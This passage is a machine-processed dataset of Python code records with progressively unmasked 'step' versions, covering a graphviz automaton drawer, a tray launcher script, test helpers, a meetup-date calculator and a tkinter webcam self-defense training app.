"step-4": "<mask token>\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n self.add_graph_node(g, self.get_state(rule), from_state,\n accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state,\n accept_states)\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[from_state, to_state] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n g.render(filename=filename, directory=directory, format='png', view\n =True)\n\n def make_label(self, rule):\n return 'ε' if rule._character == None else rule._character\n\n def format_labels(self, labels):\n return ','.join(labels)\n\n def get_state(self, rule):\n return rule._state\n\n def get_next_state(self, rule):\n return rule._next_state\n\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style='invis', shape='point')\n graph.edge(dummy_node, self.state_to_str(start_state), style='bold')\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n\n def add_edges(self, graph, edges):\n for (_from, to), labels in edges.items():\n graph.edge(_from, to, self.format_labels(labels))\n\n def state_to_str(self, state):\n if isinstance(state, str):\n return state\n try:\n iter(state)\n if len(state) == 0:\n return 'Ø'\n list_str = str([self.state_to_str(e) for e in sorted(state)])\n return list_str.replace('[', '{').replace(']', '}')\n except TypeError:\n return str(state)\n",
"step-5": "# -*- coding: utf-8 -*-\nimport graphviz\nimport fa_util\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format=\"svg\", graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n\n self.add_graph_node(g, self.get_state(rule), from_state, accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state, accept_states)\n\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[(from_state, to_state)] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n\n g.render(filename=filename, directory=directory, format=\"png\", view=True)\n\n # Supposed to be extended\n def make_label(self, rule):\n return \"ε\" if rule._character == None else rule._character\n\n # Supposed to be extended\n def format_labels(self, labels):\n return ','.join(labels)\n\n # Supposed to be extended\n def get_state(self, rule):\n return rule._state\n\n # Supposed to be extended\n def get_next_state(self, rule):\n return rule._next_state\n\n # Supposed to be extended\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style=\"invis\", shape=\"point\")\n graph.edge(dummy_node, self.state_to_str(start_state), style=\"bold\")\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n\n def add_edges(self, graph, edges):\n for (_from, to), labels in edges.items():\n graph.edge(_from, to, self.format_labels(labels))\n\n def state_to_str(self, state):\n if isinstance(state, str):\n return state\n\n try:\n iter(state)\n ### state is iterable ###\n if len(state) == 0:\n return 'Ø'\n\n # converting list object directly to set object break the order of elements in string\n list_str = str([self.state_to_str(e) for e in sorted(state)])\n return list_str.replace('[', '{').replace(']', '}')\n except TypeError:\n ### state is not iterable ###\n return str(state)\n",
"step-ids": [
6,
7,
9,
10,
12
]
}
|
[
6,
7,
9,
10,
12
] |
# -*- coding: utf-8 -*-
# Copyright 2013, Achim Köhler
# All rights reserved, see accompanied file license.txt for details.
# $REV$
import argparse
import traylauncher
if __name__ == "__main__":
args = argparse.Namespace()
args.notray = False
traylauncher.start(args)
|
normal
|
{
"blob_id": "8faaf9eb2e78b7921dd1cac4772e2415671201c7",
"index": 8481,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n args = argparse.Namespace()\n args.notray = False\n traylauncher.start(args)\n",
"step-3": "import argparse\nimport traylauncher\nif __name__ == '__main__':\n args = argparse.Namespace()\n args.notray = False\n traylauncher.start(args)\n",
"step-4": "# -*- coding: utf-8 -*-\n# Copyright 2013, Achim Köhler\n# All rights reserved, see accompanied file license.txt for details.\n\n# $REV$\n\nimport argparse\nimport traylauncher\n\nif __name__ == \"__main__\":\n\targs = argparse.Namespace()\n\targs.notray = False\n\ttraylauncher.start(args)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_data_path(file_name):
return os.path.join(DATA_DIR, file_name)
def assert_strings(test_case, actual, expected):
message = (
"""
Expected: ""\"%s""\"
Actual: ""\"%s""\"
Expected: %s
Actual: %s"""
% (expected, actual, repr(expected), repr(actual)))
test_case.assertEquals(actual, expected, message)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
DATA_DIR = 'tests/data'
def get_data_path(file_name):
return os.path.join(DATA_DIR, file_name)
def assert_strings(test_case, actual, expected):
message = (
"""
Expected: ""\"%s""\"
Actual: ""\"%s""\"
Expected: %s
Actual: %s"""
% (expected, actual, repr(expected), repr(actual)))
test_case.assertEquals(actual, expected, message)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os
DATA_DIR = 'tests/data'
def get_data_path(file_name):
return os.path.join(DATA_DIR, file_name)
def assert_strings(test_case, actual, expected):
message = (
"""
Expected: ""\"%s""\"
Actual: ""\"%s""\"
Expected: %s
Actual: %s"""
% (expected, actual, repr(expected), repr(actual)))
test_case.assertEquals(actual, expected, message)
<|reserved_special_token_1|>
# coding: utf-8
"""
Provides test-related code that can be used by all tests.
"""
import os
DATA_DIR = 'tests/data'
def get_data_path(file_name):
return os.path.join(DATA_DIR, file_name)
def assert_strings(test_case, actual, expected):
# Show both friendly and literal versions.
message = """\
Expected: \"""%s\"""
Actual: \"""%s\"""
Expected: %s
Actual: %s""" % (expected, actual, repr(expected), repr(actual))
test_case.assertEquals(actual, expected, message)
|
flexible
|
{
"blob_id": "83d35c413af0cefb71964671b43df1e815aa2115",
"index": 3945,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_data_path(file_name):\n return os.path.join(DATA_DIR, file_name)\n\n\ndef assert_strings(test_case, actual, expected):\n message = (\n \"\"\"\n\n Expected: \"\"\\\"%s\"\"\\\"\n Actual: \"\"\\\"%s\"\"\\\"\n\n Expected: %s\n Actual: %s\"\"\"\n % (expected, actual, repr(expected), repr(actual)))\n test_case.assertEquals(actual, expected, message)\n",
"step-3": "<mask token>\nDATA_DIR = 'tests/data'\n\n\ndef get_data_path(file_name):\n return os.path.join(DATA_DIR, file_name)\n\n\ndef assert_strings(test_case, actual, expected):\n message = (\n \"\"\"\n\n Expected: \"\"\\\"%s\"\"\\\"\n Actual: \"\"\\\"%s\"\"\\\"\n\n Expected: %s\n Actual: %s\"\"\"\n % (expected, actual, repr(expected), repr(actual)))\n test_case.assertEquals(actual, expected, message)\n",
"step-4": "<mask token>\nimport os\nDATA_DIR = 'tests/data'\n\n\ndef get_data_path(file_name):\n return os.path.join(DATA_DIR, file_name)\n\n\ndef assert_strings(test_case, actual, expected):\n message = (\n \"\"\"\n\n Expected: \"\"\\\"%s\"\"\\\"\n Actual: \"\"\\\"%s\"\"\\\"\n\n Expected: %s\n Actual: %s\"\"\"\n % (expected, actual, repr(expected), repr(actual)))\n test_case.assertEquals(actual, expected, message)\n",
"step-5": "# coding: utf-8\n\n\"\"\"\nProvides test-related code that can be used by all tests.\n\n\"\"\"\n\nimport os\n\n\nDATA_DIR = 'tests/data'\n\ndef get_data_path(file_name):\n return os.path.join(DATA_DIR, file_name)\n\n\ndef assert_strings(test_case, actual, expected):\n # Show both friendly and literal versions.\n message = \"\"\"\\\n\n\n Expected: \\\"\"\"%s\\\"\"\"\n Actual: \\\"\"\"%s\\\"\"\"\n\n Expected: %s\n Actual: %s\"\"\" % (expected, actual, repr(expected), repr(actual))\n test_case.assertEquals(actual, expected, message)\n\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cardinal(ordinal):
return int(''.join([char for char in ordinal if char.isdigit()]))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cardinal(ordinal):
return int(''.join([char for char in ordinal if char.isdigit()]))
def meetup_day(year, month, day_of_week, ordinal):
days = {(0): 'Monday', (1): 'Tuesday', (2): 'Wednesday', (3):
'Thursday', (4): 'Friday', (5): 'Saturday', (6): 'Sunday'}
possible_days = []
number_of_days = calendar.monthrange(year, month)[1]
days_of_month = [(datetime.date(year, month, 1) + datetime.timedelta(
days=x)) for x in range(0, number_of_days)]
for day in days_of_month:
if days[day.weekday()] == day_of_week:
possible_days.append(day.day)
if ordinal == 'teenth':
for x in possible_days:
if 10 < x < 20:
day_of_month = x
elif ordinal == 'last':
day_of_month = possible_days[-1]
else:
day_of_month = possible_days[cardinal(ordinal) - 1]
return datetime.date(year, month, day_of_month)
<|reserved_special_token_1|>
import datetime
import calendar
import re
def cardinal(ordinal):
return int(''.join([char for char in ordinal if char.isdigit()]))
def meetup_day(year, month, day_of_week, ordinal):
days = {(0): 'Monday', (1): 'Tuesday', (2): 'Wednesday', (3):
'Thursday', (4): 'Friday', (5): 'Saturday', (6): 'Sunday'}
possible_days = []
number_of_days = calendar.monthrange(year, month)[1]
days_of_month = [(datetime.date(year, month, 1) + datetime.timedelta(
days=x)) for x in range(0, number_of_days)]
for day in days_of_month:
if days[day.weekday()] == day_of_week:
possible_days.append(day.day)
if ordinal == 'teenth':
for x in possible_days:
if 10 < x < 20:
day_of_month = x
elif ordinal == 'last':
day_of_month = possible_days[-1]
else:
day_of_month = possible_days[cardinal(ordinal) - 1]
return datetime.date(year, month, day_of_month)
<|reserved_special_token_1|>
import datetime
import calendar
import re
def cardinal(ordinal):
return int(''.join([char for char in ordinal if char.isdigit()]))
def meetup_day(year, month, day_of_week, ordinal):
days = {
0: 'Monday',
1: 'Tuesday',
2: 'Wednesday',
3: 'Thursday',
4: 'Friday',
5: 'Saturday',
6: 'Sunday'
}
possible_days = []
number_of_days = calendar.monthrange(year, month)[1]
days_of_month = [datetime.date(year, month, 1) + datetime.timedelta(days=x) for x in range(0, number_of_days)]
for day in days_of_month:
if days[day.weekday()] == day_of_week:
possible_days.append(day.day)
if ordinal == 'teenth':
for x in possible_days:
if 10 < x < 20:
day_of_month = x
elif ordinal == 'last':
day_of_month = possible_days[-1]
else:
day_of_month = possible_days[cardinal(ordinal)-1]
return datetime.date(year, month, day_of_month)
|
flexible
|
{
"blob_id": "d4b1b6bdf125f2791c219b7db579c234eda0a73c",
"index": 9220,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef cardinal(ordinal):\n return int(''.join([char for char in ordinal if char.isdigit()]))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef cardinal(ordinal):\n return int(''.join([char for char in ordinal if char.isdigit()]))\n\n\ndef meetup_day(year, month, day_of_week, ordinal):\n days = {(0): 'Monday', (1): 'Tuesday', (2): 'Wednesday', (3):\n 'Thursday', (4): 'Friday', (5): 'Saturday', (6): 'Sunday'}\n possible_days = []\n number_of_days = calendar.monthrange(year, month)[1]\n days_of_month = [(datetime.date(year, month, 1) + datetime.timedelta(\n days=x)) for x in range(0, number_of_days)]\n for day in days_of_month:\n if days[day.weekday()] == day_of_week:\n possible_days.append(day.day)\n if ordinal == 'teenth':\n for x in possible_days:\n if 10 < x < 20:\n day_of_month = x\n elif ordinal == 'last':\n day_of_month = possible_days[-1]\n else:\n day_of_month = possible_days[cardinal(ordinal) - 1]\n return datetime.date(year, month, day_of_month)\n",
"step-4": "import datetime\nimport calendar\nimport re\n\n\ndef cardinal(ordinal):\n return int(''.join([char for char in ordinal if char.isdigit()]))\n\n\ndef meetup_day(year, month, day_of_week, ordinal):\n days = {(0): 'Monday', (1): 'Tuesday', (2): 'Wednesday', (3):\n 'Thursday', (4): 'Friday', (5): 'Saturday', (6): 'Sunday'}\n possible_days = []\n number_of_days = calendar.monthrange(year, month)[1]\n days_of_month = [(datetime.date(year, month, 1) + datetime.timedelta(\n days=x)) for x in range(0, number_of_days)]\n for day in days_of_month:\n if days[day.weekday()] == day_of_week:\n possible_days.append(day.day)\n if ordinal == 'teenth':\n for x in possible_days:\n if 10 < x < 20:\n day_of_month = x\n elif ordinal == 'last':\n day_of_month = possible_days[-1]\n else:\n day_of_month = possible_days[cardinal(ordinal) - 1]\n return datetime.date(year, month, day_of_month)\n",
"step-5": "import datetime\nimport calendar\nimport re\n\ndef cardinal(ordinal):\n return int(''.join([char for char in ordinal if char.isdigit()]))\n\ndef meetup_day(year, month, day_of_week, ordinal):\n days = {\n 0: 'Monday',\n 1: 'Tuesday',\n 2: 'Wednesday',\n 3: 'Thursday',\n 4: 'Friday',\n 5: 'Saturday',\n 6: 'Sunday'\n }\n\n possible_days = []\n\n number_of_days = calendar.monthrange(year, month)[1]\n\n days_of_month = [datetime.date(year, month, 1) + datetime.timedelta(days=x) for x in range(0, number_of_days)]\n\n for day in days_of_month:\n if days[day.weekday()] == day_of_week:\n possible_days.append(day.day)\n\n if ordinal == 'teenth':\n for x in possible_days:\n if 10 < x < 20:\n day_of_month = x\n elif ordinal == 'last':\n day_of_month = possible_days[-1]\n else:\n day_of_month = possible_days[cardinal(ordinal)-1]\n\n return datetime.date(year, month, day_of_month)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#THIS IS PYTHON3
import tkinter as tk
from tkinter import *
from PIL import ImageTk
from PIL import Image #to handle non-gif image formats
import cv2
import numpy as np
from statistics import mode
import time
import random
import predict as ml
def calcSuccess(predictedCounter, randAssault):
vidLabel.pack_forget()
if predictedCounter == "parry_R":
instructionLabel.config(text="RIGHT PARRY")
if randAssault == 4 or randAssault == 2:
descriptionLabel.config(text="You've successfully parried!")
elif randAssault == 3:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 5:
descriptionLabel.config(text="You've been hit!")
else:
descriptionLabel.config(text="You've been grabbed!")
if predictedCounter == "parry_L":
instructionLabel.config(text="LEFT PARRY")
if randAssault == 5 or randAssault == 3:
descriptionLabel.config(text="You've successfully parried!")
elif randAssault == 2:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 4:
descriptionLabel.config(text="You've been hit!")
else:
descriptionLabel.config(text="You've been grabbed!")
if predictedCounter == "punch_R":
instructionLabel.config(text="RIGHT PUNCH")
if randAssault == 0 or randAssault == 1 or randAssault == 4:
descriptionLabel.config(text="You've successfully counter attacked!")
elif randAssault == 2 or randAssault == 3:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 5:
descriptionLabel.config(text="You've been hit!")
if predictedCounter == "punch_L":
instructionLabel.config(text="LEFT PUNCH")
if randAssault == 0 or randAssault == 1 or randAssault == 5:
descriptionLabel.config(text="You've successfully counter attacked!")
elif randAssault == 2 or randAssault == 3:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 4:
descriptionLabel.config(text="You've been hit!")
if predictedCounter == "weave_R":
instructionLabel.config(text="RIGHT WEAVE")
if randAssault == 1 or randAssault == 3 or randAssault == 5:
descriptionLabel.config(text="You've successfully evaded!")
elif randAssault == 4:
descriptionLabel.config(text="You've been hit!")
elif randAssault == 2:
descriptionLabel.config(text="You've been cut!")
else:
descriptionLabel.config(text="You've been grabbed!")
if predictedCounter == "weave_L":
instructionLabel.config(text="LEFT WEAVE")
if randAssault == 0 or randAssault == 2 or randAssault == 4:
descriptionLabel.config(text="You've successfully evaded!")
elif randAssault == 5:
descriptionLabel.config(text="You've been hit!")
elif randAssault == 3:
descriptionLabel.config(text="You've been cut!")
else:
descriptionLabel.config(text="You've been grabbed!")
if predictedCounter == "block":
instructionLabel.config(text="BLOCK")
if randAssault == 5 or randAssault == 4:
descriptionLabel.config(text="You've successfully blocked!")
elif randAssault == 2 or randAssault == 3:
descriptionLabel.config(text="You've been cut!")
elif randAssault == 0 or randAssault == 1:
descriptionLabel.config(text="You've been grabbed!")
descriptionLabel.pack()
cap = cv2.VideoCapture(0)
root = tk.Tk() #initialize tkinter by making tk rook widget--consists of window with tile bar and decoration provided by window manager. Root widget must be made first and can only be one.
root.geometry("2000x1100")
ldFrame = Frame(root).pack(side="top") #frame to hold logo and description
canvas = Canvas(ldFrame, width=700, height=200)
canvas.pack(side="top")
#open image with pil image because PhotoImage only takes gif
pilLogo = Image.open("Logo.png")
logo = ImageTk.PhotoImage(pilLogo) #makes PhotoImage from pil image
canvas.create_image(350, 100, image=logo) #adds PhotoImage to Canvas
#make basic description label from text string on the logo description frame
descriptionText = """This program trains the user to respond in self defense to common physical threats."""
descriptionLabel = tk.Label(ldFrame, justify="center", padx=10, font=("Courier", 18), wraplength=1900, text=descriptionText)
descriptionLabel.pack(side="top")
#make center frame that will show instructions initially and then have "assaulter" prompts and live video
centerFrame = Frame(root).pack()
countdownLabel = tk.Label(centerFrame, justify="center", font=("Courier", 20), text="") #invisible for now because not packed
instructionText = """In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session."""
instructionLabel = tk.Label(centerFrame, justify="center", padx=50, pady=50, font=("Courier", 16), wraplength=1800, text=instructionText)
instructionLabel.pack(side="top")
#setup to capture video frames
vidLabel = Label(root)
def show_frame(milliseconds):
if milliseconds > 0:
#global predictionArr
_, frame = cap.read()
#predictionArr.append(predict.get_prediction(frame, "ace-connection-236822", "ICN2459521650166688930"))
frame = cv2.flip(frame, 1) #horizontally flips images so is like reflection
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) #makes normal color
img = Image.fromarray(cv2image)
imgtk = ImageTk.PhotoImage(img)
vidLabel.imgtk = imgtk
vidLabel.config(image=imgtk)
root.update()
root.after(30, show_frame, (milliseconds-30))
_, frame = cap.read()
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
img = Image.fromarray(cv2image)
img = img.convert("RGB")
img.save("imgFile.jpeg")
if milliseconds == secondsChosen*3000:
return ml.predict("imgFile.jpeg")
#make bottom frame that hold buttons
buttonFrame = Frame(root)
buttonFrame.pack(side="bottom")
difficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=("Courier", 16))
difficultyList.insert(1, "Easy: 6 seconds")
difficultyList.insert(2, "Medium: 3 seconds")
difficultyList.insert(3, "Hard: 1 seconds")
difficultyList.pack(side="top")
cycling = True
def runPrompt():
startButton.config(text="Next")
startButton.pack(side=LEFT)
resetButton.pack(side=RIGHT)
descriptionLabel.pack_forget()
assaultList = ["Grab from your right", "Grab from your left", "Blade attack from the right", "Blade attack from the left", "Hit from the right", "Hit from the left"]
counterList = ["parry_R", "parry_L", "weave_R", "weave_L", "punch_R", "punch_L", "block"]
difficultyChoice = (difficultyList.get(ACTIVE))
global secondsChosen
secondsChosen = 0
if difficultyChoice[0] == "E":
secondsChosen = 6
elif difficultyChoice[0] == "M":
secondsChosen = 3
else:
secondsChosen = 1
print(secondsChosen)
difficultyList.pack_forget()
randAssault = random.randint(0, 5)
instructionLabel.config(text=assaultList[randAssault], font=("Courier", 25))
vidLabel.pack()
predictedCounter = show_frame(secondsChosen*1000)
if predictedCounter not in counterList:
predictedCounter = counterList[random.randint(0, 6)]
root.after(secondsChosen*1200, calcSuccess, predictedCounter, randAssault)
return 0
def reset():
resetButton.pack_forget()
startButton.config(text="Start")
startButton.pack(side=BOTTOM)
instructionLabel.config(text=instructionText, font=("Courier", 16))
descriptionLabel.config(text=descriptionText, font=("Courier", 18))
descriptionLabel.pack(side=TOP)
difficultyList.pack(side=TOP)
startButton = Button(buttonFrame, bd=6, padx=20, pady=20,font=("Courier", 16), text="Start", fg="green", command=runPrompt)
startButton.pack(side=BOTTOM)
resetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=("Courier", 16), text="Reset", fg="red", command=reset)
root.mainloop()
cap.release()
|
normal
|
{
"blob_id": "8cf6a9243182a4f6b68199a8967e06790396dc10",
"index": 5967,
"step-1": "<mask token>\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\n<mask token>\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen 
* 3000:\n return ml.predict('imgFile.jpeg')\n\n\n<mask token>\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\n<mask token>\nroot.geometry('2000x1100')\n<mask token>\ncanvas.pack(side='top')\n<mask token>\ncanvas.create_image(350, 100, image=logo)\n<mask token>\ndescriptionLabel.pack(side='top')\n<mask token>\ninstructionLabel.pack(side='top')\n<mask token>\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n 
root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\n<mask token>\nbuttonFrame.pack(side='bottom')\n<mask token>\ndifficultyList.insert(1, 'Easy: 6 seconds')\ndifficultyList.insert(2, 'Medium: 3 seconds')\ndifficultyList.insert(3, 'Hard: 1 seconds')\ndifficultyList.pack(side='top')\n<mask token>\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 